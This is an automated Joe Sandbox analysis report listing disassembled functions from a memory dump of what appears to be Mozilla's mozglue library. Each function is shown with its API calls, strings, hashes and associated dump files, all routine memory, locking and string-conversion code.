Opcode Fuzzy Hash: caf3e7704822f2addaf2677514d346225285f95a206d5c06274acda0d33bd75b
Instruction Fuzzy Hash: 2241A171904B469BD300DF29C48056BFBF4FF9A254F604B2EE4A997680DB30E559CB92

Function 6C996470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C9982BC,?,?), ref: 6C99649B

Part of subcall function 6C96CA10: malloc.MOZGLUE(?), ref: 6C96CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9964A9

Part of subcall function 6C98FA80: GetCurrentThreadId.KERNEL32 ref: 6C98FA8D
Part of subcall function 6C98FA80: AcquireSRWLockExclusive.KERNEL32(6C9DF448), ref: 6C98FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C99653F
free.MOZGLUE(?), ref: 6C99655A

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 78b174288c16fb3899ff68a040e3794a56d5920168d6b753a99ca4954e498543
Instruction ID: 5d1ed47b612aaa19d3445733a6fce65672bf1dbe08f0c3282fef5dc97e92502d
Opcode Fuzzy Hash: 78b174288c16fb3899ff68a040e3794a56d5920168d6b753a99ca4954e498543
Instruction Fuzzy Hash: 8B317EB5A08705AFD740CF14D880A9ABBF4BFA8314F10482EE85A97740DB30E919CB92

Function 6C98FF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C9AD019,?,?,?,?,?,00000000,?,6C99DA31,00100000,?), ref: 6C98FFD3
memcpy.VCRUNTIME140(00000000,?,?,?,6C9AD019,?,?,?,?,?,00000000,?,6C99DA31,00100000,?,?), ref: 6C98FFF5
free.MOZGLUE(?,?,?,?,?,6C9AD019,?,?,?,?,?,00000000,?,6C99DA31,00100000,?), ref: 6C99001B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C9AD019,?,?,?,?,?,00000000,?,6C99DA31,00100000,?,?), ref: 6C99002A

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 826125452-0
Opcode ID: d1e9a6697ef0f8e2fdef3903f4ecd0da94cf41952a868af1e85a09b52c30ccae
Instruction ID: f4e5e0f5c16f909b7cb312d189a806363e8cca5c1bbd63e2f55b1bae78501e82
Opcode Fuzzy Hash: d1e9a6697ef0f8e2fdef3903f4ecd0da94cf41952a868af1e85a09b52c30ccae
Instruction Fuzzy Hash: 092108B2B002155BC7089E7C9C948AFB7BAFB993283250738D425D7780EB30DD1186E1

Function 6C96B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C96B4F5
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C96B502
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C96B542
free.MOZGLUE(?), ref: 6C96B578

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 413b91b72791cdf31f6e5a20aea3889f753af2122a8e2120a1d9d3bf3532e05d
Instruction ID: 0894c2c953dea2b7385df97e14bc304ed39d16faa6129f7da71c1011abd265c9
Opcode Fuzzy Hash: 413b91b72791cdf31f6e5a20aea3889f753af2122a8e2120a1d9d3bf3532e05d
Instruction Fuzzy Hash: 36118C31A08F45C7E7218F2AC8047A5B3B5FFA6319F24970AE84963E01FBB1F1C59691

Function 6C993DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C95F20E,?), ref: 6C993DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C95F20E,00000000,?), ref: 6C993DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C993E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C993E0E

Part of subcall function 6C98CC00: GetCurrentProcess.KERNEL32(?,?,6C9531A7), ref: 6C98CC0D
Part of subcall function 6C98CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C9531A7), ref: 6C98CC16

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 1780f16c9e4972a978fc2bac2f17faf98be9e3e029178694cfe04844e1628a54
Instruction ID: 82f8c848c077912729aa79f4c00a0283270150cdbdaa2a7c1ece37f49bf143a2
Opcode Fuzzy Hash: 1780f16c9e4972a978fc2bac2f17faf98be9e3e029178694cfe04844e1628a54
Instruction Fuzzy Hash: 57F012716002087BDB00AB54DC81DAB376DEF56628F140420FD0957741D635FE6596F7

Function 6C9A20B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C9A20B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6C98FBD1), ref: 6C9A20C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C98FBD1), ref: 6C9A20DA
free.MOZGLUE(00000000,?,6C98FBD1), ref: 6C9A20F1

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 98e032636ff37c3595b6f6039d7dce6c37bc0714a5563ed82be1aebd06bb9ba7
Instruction ID: dffe14cf7f10b13ba22c6fcd429b6cdec438255aa13afdc113a47be198ebd7f5
Opcode Fuzzy Hash: 98e032636ff37c3595b6f6039d7dce6c37bc0714a5563ed82be1aebd06bb9ba7
Instruction Fuzzy Hash: 43E0E531608E259BC3209F26980854EB7F9EF96218B20022AE50AD3B00DB75F58686E6

Function 6C9A85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C9A85D3

Part of subcall function 6C96CA10: malloc.MOZGLUE(?), ref: 6C96CA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C9A8725

Strings

map/set<T> too long, xrefs: 6C9A8720

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: d388070a54c6fb628f315dcb6579e435a8d66e584e0028e601dd40f85569fcc6
Instruction ID: 78abb823d426034734ac82ea2d71a2a9e40651a0948d6a7529e1d0d1c1036994
Opcode Fuzzy Hash: d388070a54c6fb628f315dcb6579e435a8d66e584e0028e601dd40f85569fcc6
Instruction Fuzzy Hash: 3F518774A00685CFE709CF58C084B65BBF1BF59318F19C19AD8595BB62C334E846CF96

Function 6C95BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C95BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C95BE8F

Strings

0, xrefs: 6C95BE5B

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 3bb851d4a24a3c94b1b57a50d7ada213a41af0139628a2820582b090ee4dd058
Instruction ID: 224e669c214a6a55e36c1d0313d10456ede9b70068a574a7b6ec19c97907299e
Opcode Fuzzy Hash: 3bb851d4a24a3c94b1b57a50d7ada213a41af0139628a2820582b090ee4dd058
Instruction Fuzzy Hash: 1A41A271A09749CFC701CF38C481A9BB7F4AF9A348F448A1DF985A7611D731E969CB82

Function 6C993CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C993D19
mozalloc_abort.MOZGLUE(?), ref: 6C993D6C

Strings

d, xrefs: 6C993D58

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: c497ee272bd85c0a2daa55b3ce090610ba1680cd56dfeb06f20d4e29927c36ef
Instruction ID: ae06156d6bacca7e9dd5d9bb8c3e17f4f1e599da0bbb2d82f8cd29c6ab0d3005
Opcode Fuzzy Hash: c497ee272bd85c0a2daa55b3ce090610ba1680cd56dfeb06f20d4e29927c36ef
Instruction Fuzzy Hash: BD11C836E08688D7DB009F69CC244EDB779FF96218B499219DC49A7621EB30E6C4C350

Function 6C964730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C9644B2,6C9DE21C,6C9DF7F8), ref: 6C96473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C96474A

Strings

GetNtLoaderAPI, xrefs: 6C964744

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: 8c30f4870fa00abb936e6fa3bad4116a238399edea6652f99df304fd981a1bab
Instruction ID: f1cda16d695908bbd307540fdb4711dc50a4806afec0f63a8687042f72b68fbf
Opcode Fuzzy Hash: 8c30f4870fa00abb936e6fa3bad4116a238399edea6652f99df304fd981a1bab
Instruction Fuzzy Hash: E7019275708754CFDF00AFA68854619BBB9EF8B761B154469EA06D7740CB70E801CFA2

Function 6C9B6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C9B6E22
__Init_thread_footer.LIBCMT ref: 6C9B6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C9B6E1D

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: f6f3ef003dba3d1df7c96444c16f65cef3b45e50ef26198ecf2115b1958b2b3d
Instruction ID: 4eec0349a851278febdca1097a833dac929feb13fc97b1122e099e3fb31f5552
Opcode Fuzzy Hash: f6f3ef003dba3d1df7c96444c16f65cef3b45e50ef26198ecf2115b1958b2b3d
Instruction Fuzzy Hash: 2BF0503120994CDBDB008BA8C852A9273F1935361CF5C0155F80477F91C731F65ACB53

Function 6C969E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C969EEF

Strings

Infinity, xrefs: 6C969EB7
NaN, xrefs: 6C969EC1

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 842404dea5dc68143e665006d6f2dec5d3da53abc672d39268244c2f592baed2
Instruction ID: a68406bf20254f7c53f4006fc1909cdaea423b497af1176b9eea011b9f2a109e
Opcode Fuzzy Hash: 842404dea5dc68143e665006d6f2dec5d3da53abc672d39268244c2f592baed2
Instruction Fuzzy Hash: 0AF04971609E41CBEB00CF98D847B9473B1A75771DF354A59C5082BB80D775F6CACA82

Function 6C96BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C96BEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C96BEF5

Strings

cryptbase.dll, xrefs: 6C96BEF0

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 7d098df918a7eae6cdc4537d316f34f2c377ae96583c6bd8a7a5dc7461c70023
Instruction ID: 9c1673ca6a609f562cc4062b7d4c9acec0c25ea6c164f6b512cc7d3c994cb781
Opcode Fuzzy Hash: 7d098df918a7eae6cdc4537d316f34f2c377ae96583c6bd8a7a5dc7461c70023
Instruction Fuzzy Hash: 89D023311C4508F7D7016B518C09F1937789702715F20C020F30564C91D7B0F450DFE4

Function 6C9550E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C954E9C,?,?,?,?,?), ref: 6C95510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C954E9C,?,?,?,?,?), ref: 6C955167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C955196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C954E9C), ref: 6C955234

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: edee7e2876aee732ff45a78ac653b5fdb823a2baad613fbc1bdc7a711393f647
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: B691CE35501646CFCB14CF09C490A5ABBA6FF99318B28858CDC589BB16D331FD92CBE1

Function 6C9908F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C9DE7DC), ref: 6C990918
LeaveCriticalSection.KERNEL32(6C9DE7DC), ref: 6C9909A6
EnterCriticalSection.KERNEL32(6C9DE7DC,?,00000000), ref: 6C9909F3
LeaveCriticalSection.KERNEL32(6C9DE7DC), ref: 6C990ACB

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 833df88e8fe081bc6b3f9d58f19570b1048e26883e55ca00b94d8daccd3156b9
Instruction ID: d3befe7a4f976c521bfad4eace1527be6ce43af4b2af64afd759f938475818cc
Opcode Fuzzy Hash: 833df88e8fe081bc6b3f9d58f19570b1048e26883e55ca00b94d8daccd3156b9
Instruction Fuzzy Hash: 90512C36B06E50CBEB049A15C414665B3B9EB8AF2473D853ADD75A7F80D731FC8186C1

Function 6C9AB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C9AB2C9,?,?,?,6C9AB127,?,?,?,?,?,?,?,?,?,6C9AAE52), ref: 6C9AB628

Part of subcall function 6C9A90E0: free.MOZGLUE(?,00000000,?,?,6C9ADEDB), ref: 6C9A90FF
Part of subcall function 6C9A90E0: free.MOZGLUE(?,00000000,?,?,6C9ADEDB), ref: 6C9A9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C9AB2C9,?,?,?,6C9AB127,?,?,?,?,?,?,?,?,?,6C9AAE52), ref: 6C9AB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C9AB2C9,?,?,?,6C9AB127,?,?,?,?,?,?,?,?,?,6C9AAE52), ref: 6C9AB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C9AB127,?,?,?,?,?,?,?,?), ref: 6C9AB74D

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 81c3d9851fc4180664e1f212f6afe8b6158799243a141def6e7f56d8bc58896f
Instruction ID: c65967e1f85ce746cd827f6644134cdf9e4f9b300e1e802e70dec5fa333f7cc0
Opcode Fuzzy Hash: 81c3d9851fc4180664e1f212f6afe8b6158799243a141def6e7f56d8bc58896f
Instruction Fuzzy Hash: 8651ED71A0521ACBDB14CF98C98076EBBB5FF44704F15852DC85AABB10D771E806CBA1

Function 6C9ADF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C99FF2A), ref: 6C9ADFFD

Part of subcall function 6C9A90E0: free.MOZGLUE(?,00000000,?,?,6C9ADEDB), ref: 6C9A90FF
Part of subcall function 6C9A90E0: free.MOZGLUE(?,00000000,?,?,6C9ADEDB), ref: 6C9A9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C99FF2A), ref: 6C9AE04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C99FF2A), ref: 6C9AE0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C99FF2A), ref: 6C9AE0FE

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 14355927457d629c4872fcd489a0407ca909c108c9ebe1080465899144166865
Instruction ID: f2ae2ce04c91387e652841b62fccb90e4afd234def3e245de11b8f595b4916ab
Opcode Fuzzy Hash: 14355927457d629c4872fcd489a0407ca909c108c9ebe1080465899144166865
Instruction Fuzzy Hash: 8741C471608226CFEB14CFA9C89036A73B5BB45308F14453DD516EB740E731E966CB92

Function 6C9A6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C9A6EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C9A6EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C9A6F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9A6F5C

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 43aee19e3f0c5cb9c66f6c71f6eece80b20e29e2182b737823a5defea81eab87
Instruction ID: 27068665d7e028ac19d70f7693af422e3f232266c6bb996cdf046fac444b5bb7
Opcode Fuzzy Hash: 43aee19e3f0c5cb9c66f6c71f6eece80b20e29e2182b737823a5defea81eab87
Instruction Fuzzy Hash: 9531F671A1060A8FDB04CF6CC9806AA73E9EB94304F60423DD41AD7651EF31E66AC7A1

Function 6C9BB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C960A4D), ref: 6C9BB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C960A4D), ref: 6C9BB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C960A4D), ref: 6C9BB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C960A4D), ref: 6C9BB67F

Memory Dump Source

